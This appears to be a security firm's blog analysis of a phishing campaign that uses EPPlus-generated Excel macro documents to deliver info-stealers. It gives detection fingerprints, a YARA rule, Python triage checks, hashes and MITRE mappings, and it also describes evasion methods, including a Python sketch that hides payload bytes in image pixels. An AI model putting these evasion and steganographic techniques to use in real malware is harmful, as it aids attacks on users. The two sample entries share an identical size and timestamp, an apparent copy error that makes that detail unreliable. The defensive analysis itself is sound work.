    • ZIP Date: every file included in a ZIP file has a timestamp (DOSDATE and DOSTIME fields in the ZIPFILE record). For documents created (or edited) with Microsoft Office, this timestamp is always 1980-01-01 00:00:00 (0x0021 for DOSDATE and 0x0000 for DOSTIME). OOXML files created with EPPlus have a timestamp that corresponds to the creation time of the document. Usually, that timestamp is the same for all files inside the OOXML file, but due to execution delays, there can be a difference of 2 seconds between timestamps; 2 seconds is the resolution of the DOSTIME format.

Figure 2 – DOSTIME difference (left: EPPlus created file)

  • Extra ZIP records: a typical ZIP file is composed of ZIP file records (magic 50 4B 03 04) with metadata for the file, and the (compressed) file content. Then there are ZIP directory entries (magic 50 4B 01 02) followed by a ZIP end-of-directory record (magic 50 4B 05 06). Microsoft Office creates OOXML files containing these 3 ZIP record types. EPPlus creates OOXML files containing 4 ZIP records: it also includes a ZIP data description record (magic 50 4B 07 08) after each ZIP file record.

Figure 3 – Extra ZIP records (left: EPPlus created file)

  • Missing Office document metadata: an OOXML document created with Microsoft Office contains metadata (author, title, …). This metadata is stored inside XML files found inside the docProps folder. By default, documents created with EPPlus don’t have metadata: there is no docProps folder inside the ZIP container.

Figure 4 – Missing metadata (left: EPPlus created file)

  • VBA Purged: OOXML files with a VBA project created with Microsoft Office contain an OLE file (vbaProject.bin) with streams containing the compiled VBA code and the compressed VBA source code. Documents created with EPPlus do not contain compiled VBA code, only compressed VBA source code. This means that:
    • The module streams only contain compressed VBA code
    • There are no SRP streams (SRP streams contain implementation-specific and version-dependent compiled code; their names start with __SRP_)
    • The _VBA_PROJECT stream does not contain compiled VBA code. In fact, the content of the _VBA_PROJECT stream is hardcoded in the EPPlus source code: it’s always CC 61 FF FF 00 00 00.

Figure 5 – Hardcoded stream content (left: EPPlus created file)
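For triage purposes, three of the properties above can be checked with nothing but the Python standard library. The sketch below is our own illustration, not one of the tools used during the investigation, and it is a heuristic rather than a definitive classifier:

```python
import zipfile

def epplus_fingerprints(path: str) -> dict:
    """Heuristic checks for EPPlus-style OOXML documents."""
    results = {}
    with zipfile.ZipFile(path) as z:
        # Office sets every member timestamp to 1980-01-01 00:00:00;
        # real timestamps suggest a third-party library such as EPPlus.
        results["real_zip_timestamps"] = any(
            info.date_time != (1980, 1, 1, 0, 0, 0) for info in z.infolist())
        # EPPlus-created documents lack the docProps metadata folder.
        results["missing_docProps"] = not any(
            n.startswith("docProps/") for n in z.namelist())
    # EPPlus writes a data descriptor record (PK\x07\x08) after each file;
    # Office-created OOXML files contain none.
    with open(path, "rb") as f:
        results["data_descriptors"] = f.read().count(b"PK\x07\x08")
    return results
```

A document showing real ZIP timestamps, no docProps folder, and a non-zero data descriptor count matches the fingerprint described above and warrants a closer look.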

In addition to the above, we have also observed some properties of the VBA source code that hint at the use of a creation tool based on a library like EPPlus.

There are a couple of variants to the VBA source code used by the actor (some variants use PowerShell to download the payload, others use pure VBA code). But all these variants contain a call to a loader function with one argument, a string with the URL (either BASE64 or hexadecimal encoded). Like this (hexadecimal example):

Loader"68 74 74 70 …"

Do note that there is no space character between the function name and the argument: there is no space between Loader and "68 74 74 70 …".

This is an indication that the VBA code was not entered through the VBA IDE in Office: when you type a statement like this without a space character, the VBA IDE will automatically add a space character for you (even if you copy/paste the code). The absence of this space character divulges that this code was not entered through the VBA IDE, but likely generated via a library such as EPPlus.
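This tell-tale can be turned into a simple triage check. The regex below is a hypothetical illustration (not part of our actual analysis tooling) that flags VBA lines where a string literal immediately follows an identifier without a separating space:

```python
import re

# Flag statements like: Loader"68 74 74 70 ..." (no space before the quote),
# which the VBA IDE would normally have rewritten with a space.
NO_SPACE_CALL = re.compile(r'^\s*([A-Za-z_]\w*)"', re.MULTILINE)

def suspicious_calls(vba_source: str) -> list:
    """Return identifiers that are immediately followed by a string literal."""
    return NO_SPACE_CALL.findall(vba_source)
```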

To illustrate these differences in properties, we show examples with one of our internal tools (ExcelVBA) using the EPPlus library. We create a vba.xlsm file with the VBA code in text file vba.txt using our tool ExcelVBA, and show some of its properties:

Figure 6 – NVISO created XLSM file using the EPPlus library

Figure 7 – Running oledump.py reveals this document was created using the EPPlus library

Some of the malicious documents contain objects that clearly have been created with EPPlus, using some of the example code found on the EPPlus Wiki. We illustrate this with the following example (the first document in this campaign):

Filename: Scan Order List.xlsm
MD5: 8857fae198acd87f7581c7ef7227c34d
SHA256: 8a863b5f154e1ddba695453fdd0f5b83d9d555bae6cf377963c9009c9fa6c9be
File Size: 5.77 KB (5911 bytes)
Earliest Contents Modification: 2020-06-22 14:01:46

This document contains a drawing1.xml object (a rounded rectangle) with this name: name=”VBASampleRect”.

Figure 8 – zipdump of maldoc

Figure 9 – Selecting the drawing1.xml object reveals the name

This was created with sample code found on the EPPlus Wiki[2]:

Figure 10 – EPPlus sample code, clearly showing the similarities

Noteworthy is that all maldocs we observed have their VBA project protected with a password. It is interesting to note that the VBA code itself is not encoded/encrypted; it is stored in cleartext (although compressed) [3]. When a document with a password-protected VBA project is opened, the VBA macros will execute without the password: the user does not need to provide it. The password is only required to view the VBA project inside the VBA IDE (Integrated Development Environment):

Figure 11 – Password prompt for viewing the VBA project

We were not able to recover these passwords. We used John the Ripper with the rockyou.txt password list[4], and Hashcat with a small ASCII brute-force attack.

Although each malicious document is unique with its own VBA code, with more than 200 samples analyzed to date, we can generalize and abstract all this VBA code to just a handful of templates. The VBA code will either use PowerShell or ActiveX objects to download the payload. The different strings are encoded using either hexadecimal, BASE64 or XOR-encoding; or a combination of these encodings. A Yara rule to detect these maldocs is provided at the end of this blog post for identification and detection purposes.
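The string encodings mentioned above are all simple to reverse. A minimal Python sketch (the key and sample strings below are illustrative, not taken from a specific sample):

```python
import base64

def xor_decode(data: bytes, key: bytes) -> bytes:
    # repeating-key XOR, as used by some maldoc variants to hide strings
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# BASE64: "aHR0cA==" decodes to the first bytes of the URL scheme
assert base64.b64decode("aHR0cA==") == b"http"

# XOR with a repeating key is its own inverse
secret = xor_decode(b"http", b"\x42")
assert xor_decode(secret, b"\x42") == b"http"
```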

Payload analysis

As mentioned in the previous section, a second-stage payload is downloaded from various websites via the malicious VBA code. Each second-stage executable created by its respective malicious document acts as a dropper for the final payload. In order to thwart detection mechanisms such as antivirus solutions, a variety of obfuscation techniques is leveraged, which are however not advanced enough to hide the malicious intent. The infrastructure used by the threat actor appears to mainly comprise compromised websites.

Popular antivirus solutions such as those listed on VirusTotal, shown in Figure 12, commonly identify the second-stage executables as "AgentTesla". While leveraging VirusTotal for malware identification is not an ideal method, it does display how simple obfuscation can result in an incorrect classification. Throughout this analysis, we'll explain how only a few of these popular detections turned out to be accurate.

Figure 12: VirusTotal “AgentTesla” mis-identification.

The different obfuscation techniques we observed outline a pattern common to all second-stage executables of operation Epic Manchego. As can be observed in Figure 13, the second stage will dynamically load a decryption DLL. This DLL component then proceeds to extract additional settings and a third-stage payload before transferring the execution to the final payload, typically an information stealer.

Figure 13: Operation Epic Manchego final stage delivery mechanism.

Although the above obfuscation pattern is common to all samples, we have observed an evolution in its complexity as well as a wide variation in perhaps more opportunistic techniques.

                             Early Variants                Recent Variants
DLL Component Obfuscation    Obfuscated base64 encoding    Empty fixed-size structures
Final Payload Obfuscation    Single-PNG encoding           Multi-BMP dictionary encoding
Opportunistic Obfuscation    Name randomisation            Run-time method resolving, Goto flow-control, …

Table 1 – Variant comparison

A common factor of the operation’s second-stage samples is the usage of steganography to obfuscate their malicious intent. Figure 14 identifies a partial configuration used in recent variants where a dictionary of settings, including the final payload, is encoded into hundreds of images as part of the second-stage’s embedded resources.

Figure 14: Partial dictionary encoded in a BMP image
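To illustrate the principle behind this image-based payload storage, the sketch below packs a length-prefixed byte string into pixel colour channels and recovers it again. This is a generic demonstration of byte-to-pixel packing, not the actor's exact encoding scheme:

```python
def bytes_to_pixels(data: bytes) -> list:
    # prefix with a 4-byte length, pad to a multiple of 3, group into (B, G, R) tuples
    blob = len(data).to_bytes(4, "little") + data
    blob += b"\x00" * (-len(blob) % 3)
    return [tuple(blob[i:i + 3]) for i in range(0, len(blob), 3)]

def pixels_to_bytes(pixels: list) -> bytes:
    # flatten the colour channels, then strip the length prefix and the padding
    blob = b"".join(bytes(p) for p in pixels)
    length = int.from_bytes(blob[:4], "little")
    return blob[4:4 + length]
```

Because the pixel values are valid image data, the resulting picture raises no suspicion when embedded as a resource, while the payload survives a lossless round-trip.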

The image itself is part of a second-stage sample with the following properties:

Filename: crefgyu.exe
MD5: 7D71F885128A27C00C4D72BF488CD7CC
SHA256: C40FA887BE0159016F3AFD43A3BDEC6D11078E19974B60028B93DEF1C2F95726
File Size: 761 KB (779,776 bytes)
Compilation Timestamp: 2020-03-09 16:39:33

Noteworthy is the likelihood that the obfuscation process was not built by the threat actors themselves. A careful review of the second-stage steganography decoding routine uncovers how most samples mistakenly contain the final payload twice. In the following representation (Figure 15) of the loader's configuration, we can see that its payload is indeed duplicated. The complexity of the second- and third-stage payloads furthermore tends to suggest the operation involves different actors, as the initial documents reflect a less experienced actor.

Throughout the multiple dictionary-based variants analyzed we furthermore noticed that, regardless of the final payload, similar keys were used as part of the settings. All dictionaries contained the final payload as “EpkVBztLXeSpKwe” while some, as seen in Figure 15, also contained the same value as “PXcli.0.XdHg”. This suggests a possible builder for payload delivery, which may be used by multiple actors.

Figure 15: Stage 2 decoded dictionary
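Spotting such duplication in a decoded settings dictionary is straightforward. The helper below is our own sketch; the key names are those observed in the samples, while the values are illustrative placeholders:

```python
from collections import defaultdict

def duplicated_settings(settings: dict) -> list:
    # group setting names by their byte-string value; return groups of size > 1
    by_value = defaultdict(list)
    for name, value in settings.items():
        by_value[value].append(name)
    return [names for names in by_value.values() if len(names) > 1]

decoded = {
    "EpkVBztLXeSpKwe": b"MZ\x90\x00...",   # final payload (placeholder bytes)
    "PXcli.0.XdHg": b"MZ\x90\x00...",      # same payload, stored twice
    "InstallPath": b"%appdata%",           # illustrative setting
}
print(duplicated_settings(decoded))  # -> [['EpkVBztLXeSpKwe', 'PXcli.0.XdHg']]
```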

Within the manually analyzed dataset of 30 distinct dictionary-based second stages, 19 unique final payloads were observed. From these, the "Azorult" stealer accounts for 50% of the variant's delivery (Figure 16). Other payloads include "AgentTesla", "Formbook", "Matiex" and "njRAT", which are all well-documented already. Both "Azorult" and "njRAT" have a noticeable reusage rate.

Figure 16: Dictionary-based payload classification and (re-)usage of samples with trimmed hashes
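Statistics such as those in Figure 16 can be reproduced from a list of (payload hash, family) observations with a few lines of Python; the trimmed hashes below are placeholders, not the actual dataset:

```python
from collections import Counter

observations = [  # (trimmed sha256, family) per dropper analyzed; placeholder data
    ("c40fa8", "Azorult"), ("c40fa8", "Azorult"), ("11aa22", "Azorult"),
    ("33bb44", "AgentTesla"), ("55cc66", "njRAT"), ("55cc66", "njRAT"),
]

families = Counter(family for _, family in observations)
reused = [sha for sha, count in Counter(sha for sha, _ in observations).items() if count > 1]

print(families.most_common(1))  # -> [('Azorult', 3)]
print(sorted(reused))           # -> ['55cc66', 'c40fa8']
```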

Our analysis of droppers and respective payloads uncovered a common pattern in obfuscation routines. While opportunistic obfuscation methods may evolve, the delivered payloads remain part of a rather limited set of malware families.


Victimology

A small number of the malicious documents we retrieved from VirusTotal were uploaded together with the phishing email itself. Analysis of these emails can shed some light on the potential targets of this actor. Due to the limited number of source emails retrieved, it was not possible to identify a clear pattern among the victims. In the 6 emails we were able to retrieve, recipients were in the medical equipment sector, the aluminium sector, facility management and a vendor of custom-made press machines.

When looking into the sender domains, it appears most emails were sent from legitimate companies. Checking the email addresses against the "Have I Been Pwned"[5] service turned up no known compromises. This leaves us to wonder whether the threat actor was able to leverage these accounts during an earlier infection, or whether a different party supplied them. Regardless of who compromised the accounts, it appears the threat actor primarily uses legitimate corporate email accounts to initiate the phishing campaign.

Looking at both sender and recipient, there doesn’t appear to be a pattern we can deduce to identify potential new targets. There does not seem to be a specific sector targeted nor are the sending domains affiliated with each other.

Both body (content) and subject of the emails relate to a more classic phishing scheme, for example, a request to initiate business for which the attachment provides the 'details'. An overview of subjects observed can be seen below; note that some subjects have been altered by the respective mail gateways:

  • Re: Quotation required/
  • Quote volume and weight for preferred
  • *****SPAM***** FW:Offer_10044885_[companyname]_2_09_2020.xlsx*
  • [SUSPECTED SPAM] Alternatives for Request*
  • Purchase Order Details
  • Quotation Request

Figure 17 – Sample phishing email

This method of enticing users to open the attachments is nothing new and does not provide a lot of additional information to pinpoint the campaign targeting any specific organisation or verticals.

However, leveraging public submissions of the maldocs through VirusTotal, we clustered over 200 documents, which allowed us to rank 27 countries by submission count without differentiating between uploads possibly performed through VPNs. As shown in Figure 18, areas such as the United States, Czech Republic, France, Germany, as well as China, account for the majority of targeted regions.

Figure 18 – Geographical distribution of VT submissions

When analysing the initial documents for targeted regions, we primarily identified English, Spanish, Chinese and Turkish language-based images.

Figure 19 – Maldoc content in Chinese, Turkish, Spanish and English respectively

Some images, however, contained an interesting detail: some of the document properties are in Cyrillic, regardless of the image's primary language.

Although the Cyrillic Word settings were observed in multiple images, a new maldoc detected at the time of writing this blog post piqued our interest, as it appears to be the first one to explicitly impersonate a healthcare sector member ("Ohiohealth Hardin Memorial Hospital"), as can be observed in Figure 20. Note also the settings as described above: СТРАНИЦА 1 ИЗ 1, which means "page 1 of 1".

Figure 20 – Maldoc content impersonating “Ohiohealth Hardin Memorial Hospital” with Cyrillic Word settings

This Microsoft Excel document has the following details:

Filename: 새로운 주문 _2608.xlsm (Korean: New order _2608.xlsm)
MD5: 551b5dd7aff4ee07f98d11aac910e174
SHA256: 45cab564386a568a4569d66f6781c6d0b06a9561ae4ac362f0e76a8abfede7bb
File Size: 5.77 KB (5911 bytes)
Earliest Contents Modification: 2020-06-22 14:01:46

While the template from said hospital may have been simply discovered on the web and consequently used by the threat actor, this surprising change in modus operandi does appear to align with the actor’s constant evolution observed since the start of tracking.


Conclusion

Based on the analysis, NVISO assesses the following:

  • The threat actor observed has worked out a new method to create malicious Office documents with a way to at least slightly reduce detection mechanisms;
  • The actor is likely experimenting and evolving its methodology in which malicious Office documents are created, potentially automating the workflow;
  • While the targeting seems rather limited for now, it’s possible these first runs were intended for testing rather than a full-fledged campaign;
  • A recent uptick in detections submitted to VirusTotal suggests the actor may be ramping up their operations;
  • While the approach to create malicious documents is unique, the methodologies for payload delivery as well as actual payloads are not, and should be stopped or detected by modern technologies;
  • Of interest is a recent blog post published by Xavier Mertens on the SANS diary Tracking A Malware Campaign Through VT[6]. It appears another security researcher has also been tracking these documents, however, they have extracted the VBA code from the maldocs and uploaded that portion. These templates relate to the PowerShell way of downloading the next stage.

In conclusion, NVISO assesses this specific malicious Excel document creation technique is likely to be observed more in the wild, and may be missed by email gateways or analysts, as payload analysis is often considered more interesting. However, blocking and detecting these types of novelties, such as the maldoc creation described in this blog, enables organizations to detect and respond more quickly in case an uptick or similar campaign occurs. The recommendations section provides ruling and indicators as a means of detection.

Recommendations

  • Filter email attachments and emails sent from outside your organization;
  • Implement robust endpoint detection and response (EDR) defenses;
  • Provide phishing awareness training and perform regular phishing exercises.


YARA rule

We provide the following rule to implement in your detection mechanisms for use in further hunting missions.

rule xlsm_without_metadata_and_with_date {
    meta:
        description = "Identifies .xlsm files created with EPPlus"
        author = "NVISO (Didier Stevens)"
        date = "2020-07-12"
        reference = "http://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers"
        tlp = "White"
    strings:
        $opc = "[Content_Types].xml"
        $ooxml = "xl/workbook.xml"
        $vba = "xl/vbaProject.bin"
        $meta1 = "docProps/core.xml"
        $meta2 = "docProps/app.xml"
        $timestamp = {50 4B 03 04 ?? ?? ?? ?? ?? ?? 00 00 21 00}
    condition:
        uint32be(0) == 0x504B0304 and $opc and $ooxml and $vba
        and not any of ($meta*) and $timestamp
}

This rule will match documents with VBA code created with EPPlus, even if they are not malicious. We had only a couple of false positives with this rule (documents created with other benign software), and quite a few hits on corrupt samples (incomplete ZIP files).
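For triage on systems without YARA installed, the rule's intent (VBA project present, docProps metadata absent, and a local file header carrying the 1980-01-01 DOS date) can be approximated over the raw bytes with Python's re module. This is our own simplified re-implementation, not a replacement for the rule itself:

```python
import re

ZIP_MAGIC = b"PK\x03\x04"
# local file header: 4-byte signature, 6 bytes of version/flags/method,
# then mod time 00 00 and mod date 21 00 (the 1980-01-01 DOS epoch)
EPOCH_HEADER = re.compile(rb"PK\x03\x04.{6}\x00\x00\x21\x00", re.DOTALL)

def matches_epplus_heuristic(data: bytes) -> bool:
    required = (b"[Content_Types].xml", b"xl/workbook.xml", b"xl/vbaProject.bin")
    metadata = (b"docProps/core.xml", b"docProps/app.xml")
    return (data.startswith(ZIP_MAGIC)
            and all(s in data for s in required)
            and not any(s in data for s in metadata)
            and EPOCH_HEADER.search(data) is not None)
```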


Indicators of compromise

Indicators of compromise can be found on our Github page here.

MITRE ATT&CK techniques

  • Initial Access:
    • T1566.001 Phishing: Spearphishing Attachment
  • Execution:
    • T1204.002 User Execution: Malicious File
  • Defense Evasion:
    • T1140 Deobfuscate/Decode Files or Information
    • T1036.005 Masquerading: Match Legitimate Name or Location
    • T1027.001 Obfuscate Files or Information: Binary Padding
    • T1027.002 Obfuscate Files or Information: Software Packing
    • T1027.003 Obfuscate Files or Information: Steganography
    • T1055.001 Process Injection: DLL Injection
    • T1055.002 Process Injection: PE Injection
    • T1497.001 Virtualization/Sandbox Evasion: System Checks


Authors

This blog post was created based on the collaborative effort of: